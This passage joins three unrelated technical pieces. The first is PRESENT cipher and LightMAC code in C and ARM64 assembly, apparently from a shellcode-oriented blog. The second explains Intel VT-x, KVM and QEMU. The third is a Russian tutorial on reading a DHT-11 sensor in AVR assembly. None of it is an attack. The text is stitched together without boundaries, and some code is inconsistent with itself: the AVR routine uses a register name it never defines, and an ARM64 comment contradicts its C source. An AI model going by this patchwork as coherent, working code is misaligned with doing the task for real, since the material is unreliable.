   0x3,0xe,0xf,0x8,0x4,0x7,0x1,0x2 };

B S(B x) {
  return (sbox[(x&0xF0)>>4]<<4)|sbox[(x&0x0F)];
}

#define rev __builtin_bswap64

void present(void*mk,void*data) {
    W i,j,r,p,t,t2,k0,k1,*k=(W*)mk,*x=(W*)data;
    
    k0=rev(k[0]); k1=rev(k[1]);t=rev(x[0]);
  
    F(i,32-1) {
      p=t^k0;
      F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
      t=0;r=0x0030002000100000;
      F(j,64)
        t|=((p>>j)&1)<<(r&255),
        r=R(r+1,16);
      p =(k0<<61)|(k1>>3);
      k1=(k1<<61)|(k0>>3);
      p=R(p,56);
      ((B*)&p)[0]=S(((B*)&p)[0]);
      k0=R(p,8)^((i+1)>>2);
      k1^=(((i+1)& 3)<<62);
    }
    x[0] = rev(t^k0);
}

The sbox lookup routine (S) uses UBFX and BFI/BFXIL in place of LSR,LSL,AND and ORR. The source requires preprocessing with cpp -E before assembly.

// PRESENT in ARM64 assembly
// 224 bytes

    .arch armv8-a
    .text
    .global present

    #define k  x0
    #define x  x1
    #define r  w2
    #define p  x3
    #define t  x4
    #define k0 x5
    #define k1 x6
    #define i  x7
    #define j  x8
    #define s  x9

present:
    str     lr, [sp, -16]!

    // k0=k[0];k1=k[1];t=x[0];
    ldp     k0, k1, [k]
    ldr     t, [x]

    // only dinosaurs use big endian convention
    rev     k0, k0
    rev     k1, k1
    rev     t, t

    mov     i, 0
    adr     s, sbox
L0:
    // p=t^k0;
    eor     p, t, k0

    // F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
    mov     j, 8
L1:
    bl      S
    ror     p, p, 8
    subs    j, j, 1
    bne     L1

    // t=0;r=0x0030002000100000;
    mov     t, 0
    ldr     r, =0x30201000
    // F(j,64)
    mov     j, 0
L2:
    // t|=((p>>j)&1)<<(r&255),
    lsr     x10, p, j         // x10 = (p >> j) & 1
    and     x10, x10, 1       // 
    lsl     x10, x10, x2      // x10 << r
    orr     t, t, x10         // t |= x10

    // r=R(r+1,16);
    add     r, r, 1           // r = R(r+1, 8)
    ror     r, r, 8

    add     j, j, 1           // j++
    cmp     j, 64             // j < 64
    bne     L2

    // p =(k0<<61)|(k1>>3);
    lsr     p, k1, 3
    orr     p, p, k0, lsl 61

    // k1=(k1<<61)|(k0>>3);
    lsr     k0, k0, 3
    orr     k1, k0, k1, lsl 61

    // p=R(p,56);
    ror     p, p, 56
    bl      S

    // i++
    add     i, i, 1

    // k0=R(p,8)^((i+1)>>2);
    lsr     x10, i, 2
    eor     k0, x10, p, ror 8

    // k1^= (((i+1)&3)<<62);
    and     x10, i, 3
    eor     k1, k1, x10, lsl 62

    // i < 31
    cmp     i, 31
    bne     L0

    // x[0] = t ^= k0
    eor     p, t, k0
    rev     p, p
    str     p, [x]

    ldr     lr, [sp], 16
    ret

S:
    ubfx    x10, p, 0, 4              // x10 = (p & 0x0F)
    ubfx    x11, p, 4, 4              // x11 = (p & 0xF0) >> 4

    ldrb    w10, [s, w10, uxtw 0]     // w10 = s[w10]
    ldrb    w11, [s, w11, uxtw 0]     // w11 = s[w11]

    bfi     p, x10, 0, 4              // p[0] = ((x11 << 4) | x10)
    bfi     p, x11, 4, 4

    ret
sbox:
    .byte 0xc, 0x5, 0x6, 0xb, 0x9, 0x0, 0xa, 0xd
    .byte 0x3, 0xe, 0xf, 0x8, 0x4, 0x7, 0x1, 0x2

7.15 LIGHTMAC

A Message Authentication Code using block ciphers. Designed by Atul Luykx, Bart Preneel, Elmar Tischhauser, and Kan Yasuda. The version shown here only supports ciphers with a 64-bit block size and 128-bit key. E is defined as a block cipher. For this code, one could use XTEA, SPECK-64/128 or PRESENT. If BLK_LEN and TAG_LEN are changed to 16, it will support 128-bit ciphers like AES-128, CHASKEY, CHAM-128/128, SPECK-128/256, LEA-128, NOEKEON. Based on the parameters used here, the largest message length can be 1,792 bytes. For a shellcode trasmitting small packets, this should be sufficient.

A MAC Mode for Lightweight Block Ciphers

To improve upon the parameters used for 64-bit block ciphers, read the following paper.

Blockcipher-based MACs: Beyond the Birthday Bound without Message Length

#define CTR_LEN     1 // 8-bits
#define BLK_LEN     8 // 64-bits
#define TAG_LEN     8 // 64-bits
#define BC_KEY_LEN 16 // 128-bits

#define M_LEN         BLK_LEN-CTR_LEN

void present(void*mk,void*data);
#define E present

#define F(a,b)for(a=0;a<b;a++)
typedef unsigned int W;
typedef unsigned char B;

// max message for current parameters is 1792 bytes
void lm(B*b,W l,B*k,B*t) {
    int i,j,s;
    B   m[BLK_LEN];

    // initialize tag T
    F(i,TAG_LEN)t[i]=0;

    for(s=1,j=0; l>=M_LEN; s++,l-=M_LEN) {
      // add 8-bit counter S 
      m[0] = s;
      // add bytes to M 
      F(j,M_LEN)
        m[CTR_LEN+j]=*b++;
      // encrypt M with K1
      E(k,m);
      // update T
      F(i,TAG_LEN)t[i]^=m[i];
    }
    // copy remainder of input
    F(i,l)m[i]=b[i];
    // add end bit
    m[i]=0x80;
    // update T 
    F(i,l+1)t[i]^=m[i];
    // encrypt T with K2
    k+=BC_KEY_LEN;
    E(k,t);
}

No assembly for this right now, but feel free to have a go!

8. Summary

ARM expects their “Deimos” design scheduled for 2019 and “Hercules” for 2020 to outperform any laptop class CPU from Intel. The A76 does not support A32 or T32, and it’s highly likely the next designs won’t either. The ARM64 instruction set is almost perfect. The only minor thing that annoys me is how the x30 register (Link Register) must be saved across calls to subroutines. There’s also no rotate left or modulus instructions that would be useful.

All code shown here can be found in this github repo.

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:

vm-arch

 

At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.

QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:

overall-diag

Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

      			cli
			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.

Определения:

==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов
			RET

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
READ:		NOP
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
			
		RCALL EXPECT_0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

